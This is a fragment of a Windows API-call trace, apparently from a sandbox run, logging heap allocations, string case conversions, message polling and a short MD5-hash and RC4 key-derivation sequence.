RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.595] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0254.595] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0254.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.596] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0254.596] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.596] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0254.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.596] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0254.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0254.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0254.597] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0254.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0254.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0254.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0254.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.597] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0254.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.597] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.597] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.598] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.598] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0254.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0254.599] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0254.599] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.599] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.599] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.600] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.600] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.600] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.600] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.600] CryptHashData (hHash=0xaa57a0, pbData=0x24b1788, dwDataLen=0x3, dwFlags=0x1) returned 1 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0254.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0254.601] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.601] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.601] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.601] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.601] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.602] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.602] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.602] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.602] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0254.602] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.602] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0254.603] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.603] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.603] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0254.603] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0254.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0254.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0254.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0254.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0254.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0254.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0254.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 